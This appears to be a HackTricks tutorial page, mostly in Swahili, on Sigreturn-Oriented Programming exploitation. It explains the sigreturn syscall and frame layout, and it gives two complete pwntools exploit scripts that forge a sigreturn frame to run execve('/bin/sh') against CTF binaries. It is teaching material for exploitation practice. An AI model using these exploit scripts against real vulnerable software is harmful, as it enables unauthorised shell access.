SROP - Sigreturn-Oriented Programming

Reading time: 6 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Basic Information

Sigreturn ni syscall maalum ambayo inatumika hasa kusafisha baada ya mhandisi wa ishara kukamilisha utekelezaji wake. Ishara ni usumbufu unaotumwa kwa programu na mfumo wa uendeshaji, mara nyingi kuashiria kwamba hali fulani ya kipekee imetokea. Wakati programu inapokea ishara, inasimamisha kazi yake ya sasa kwa muda ili kushughulikia ishara hiyo kwa signal handler, kazi maalum iliyoundwa kushughulikia ishara.

Baada ya mhandisi wa ishara kumaliza, programu inahitaji kurudi katika hali yake ya awali kana kwamba hakuna kilichotokea. Hapa ndipo sigreturn inapoingia. Inasaidia programu kurudi kutoka kwa mhandisi wa ishara na kurejesha hali ya programu kwa kusafisha fremu ya stack (sehemu ya kumbukumbu inayohifadhi wito wa kazi na vigezo vya ndani) ambayo ilitumika na mhandisi wa ishara.

Sehemu ya kuvutia ni jinsi sigreturn inavyorejesha hali ya programu: inafanya hivyo kwa kuhifadhi maadili yote ya register za CPU kwenye stack. Wakati ishara haizuiwi tena, sigreturn inatoa maadili haya kutoka kwenye stack, kwa ufanisi ikirekebisha register za CPU katika hali yao kabla ya ishara kushughulikiwa. Hii inajumuisha register ya pointer ya stack (RSP), ambayo inaelekeza kwenye kilele cha sasa cha stack.

caution

Kuita syscall sigreturn kutoka kwenye mnyororo wa ROP na kuongeza maadili ya register tunayotaka iandike kwenye stack inawezekana kudhibiti maadili yote ya register na hivyo kuita kwa mfano syscall execve na /bin/sh.

Kumbuka jinsi hii ingekuwa aina ya Ret2syscall ambayo inafanya iwe rahisi kudhibiti vigezo ili kuita Ret2syscalls nyingine:

{{#ref}} ../rop-syscall-execv/ {{#endref}}

Ikiwa unavutiwa, hii ni muundo wa sigcontext unaohifadhiwa kwenye stack ili baadaye kurejesha maadili (mchoro kutoka hapa):

+--------------------+--------------------+
| rt_sigeturn()      | uc_flags           |
+--------------------+--------------------+
| &uc                | uc_stack.ss_sp     |
+--------------------+--------------------+
| uc_stack.ss_flags  | uc.stack.ss_size   |
+--------------------+--------------------+
| r8                 | r9                 |
+--------------------+--------------------+
| r10                | r11                |
+--------------------+--------------------+
| r12                | r13                |
+--------------------+--------------------+
| r14                | r15                |
+--------------------+--------------------+
| rdi                | rsi                |
+--------------------+--------------------+
| rbp                | rbx                |
+--------------------+--------------------+
| rdx                | rax                |
+--------------------+--------------------+
| rcx                | rsp                |
+--------------------+--------------------+
| rip                | eflags             |
+--------------------+--------------------+
| cs / gs / fs       | err                |
+--------------------+--------------------+
| trapno             | oldmask (unused)   |
+--------------------+--------------------+
| cr2 (segfault addr)| &fpstate           |
+--------------------+--------------------+
| __reserved         | sigmask            |
+--------------------+--------------------+

Kwa maelezo bora angalia pia:

{{#ref}} https://youtu.be/ADULSwnQs-s?feature=shared {{#endref}}

Mfano

Unaweza kupata mfano hapa ambapo wito wa signeturn unajengwa kupitia ROP (kuweka katika rxa thamani 0xf), ingawa hii ni exploit ya mwisho kutoka hapo:

python

from pwn import *

elf = context.binary = ELF('./vuln', checksec=False)
p = process()

BINSH = elf.address + 0x1250
POP_RAX = 0x41018
SYSCALL_RET = 0x41015

frame = SigreturnFrame()
frame.rax = 0x3b            # syscall number for execve
frame.rdi = BINSH           # pointer to /bin/sh
frame.rsi = 0x0             # NULL
frame.rdx = 0x0             # NULL
frame.rip = SYSCALL_RET

payload = b'A' * 8
payload += p64(POP_RAX)
payload += p64(0xf)         # 0xf is the number of the syscall sigreturn
payload += p64(SYSCALL_RET)
payload += bytes(frame)

p.sendline(payload)
p.interactive()

Angalia pia exploit kutoka hapa ambapo binary tayari ilikuwa ikitumia sigreturn na kwa hivyo si lazima kujenga hiyo na ROP:

python

from pwn import *

# Establish the target
target = process("./small_boi")
#gdb.attach(target, gdbscript = 'b *0x40017c')
#target = remote("pwn.chal.csaw.io", 1002)

# Establish the target architecture
context.arch = "amd64"

# Establish the address of the sigreturn function
sigreturn = p64(0x40017c)

# Start making our sigreturn frame
frame = SigreturnFrame()

frame.rip = 0x400185 # Syscall instruction
frame.rax = 59       # execve syscall
frame.rdi = 0x4001ca # Address of "/bin/sh"
frame.rsi = 0x0      # NULL
frame.rdx = 0x0      # NULL

payload = "0"*0x28 # Offset to return address
payload += sigreturn # Function with sigreturn
payload += str(frame)[8:] # Our sigreturn frame, adjusted for the 8 byte return shift of the stack

target.sendline(payload) # Send the target payload

# Drop to an interactive shell
target.interactive()

Mifano Mingine & Marejeleo

https://youtu.be/ADULSwnQs-s?feature=shared
https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop
https://guyinatuxedo.github.io/16-srop/backdoor_funsignals/index.html
Assembly binary inayoruhusu kuandika kwenye stack na kisha inaita syscall ya sigreturn. Inawezekana kuandika kwenye stack ret2syscall kupitia muundo wa sigreturn na kusoma bendera ambayo iko ndani ya kumbukumbu ya binary.
https://guyinatuxedo.github.io/16-srop/csaw19_smallboi/index.html
Assembly binary inayoruhusu kuandika kwenye stack na kisha inaita syscall ya sigreturn. Inawezekana kuandika kwenye stack ret2syscall kupitia muundo wa sigreturn (binary ina mfuatano wa /bin/sh).
https://guyinatuxedo.github.io/16-srop/inctf17_stupidrop/index.html
64 bits, hakuna relro, hakuna canary, nx, hakuna pie. Uvunjaji rahisi wa buffer ukitumia kazi ya gets na ukosefu wa gadgets zinazofanya ret2syscall. Mnyororo wa ROP unaandika /bin/sh kwenye .bss kwa kuita gets tena, inatumia kazi ya alarm kuweka eax kuwa 0xf ili kuita SROP na kutekeleza shell.
https://guyinatuxedo.github.io/16-srop/swamp19_syscaller/index.html
Programu ya assembly ya 64 bits, hakuna relro, hakuna canary, nx, hakuna pie. Mchakato unaruhusu kuandika kwenye stack, kudhibiti register kadhaa, na kuita syscall kisha inaita exit. Syscall iliyochaguliwa ni sigreturn ambayo itapanga register na kuhamasisha eip ili kuita amri ya syscall ya awali na kuendesha memprotect kuweka nafasi ya binary kuwa rwx na kuweka ESP katika nafasi ya binary. Kufuatia mchakato, programu itaita kusoma ndani ya ESP tena, lakini katika kesi hii ESP itakuwa ikielekeza kwenye amri inayofuata hivyo kupitisha shellcode kutaiandika kama amri inayofuata na kuitekeleza.
https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/sigreturn-oriented-programming-srop#disable-stack-protection
SROP inatumika kutoa ruhusa za utekelezaji (memprotect) kwa mahali ambapo shellcode iliwekwa.

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.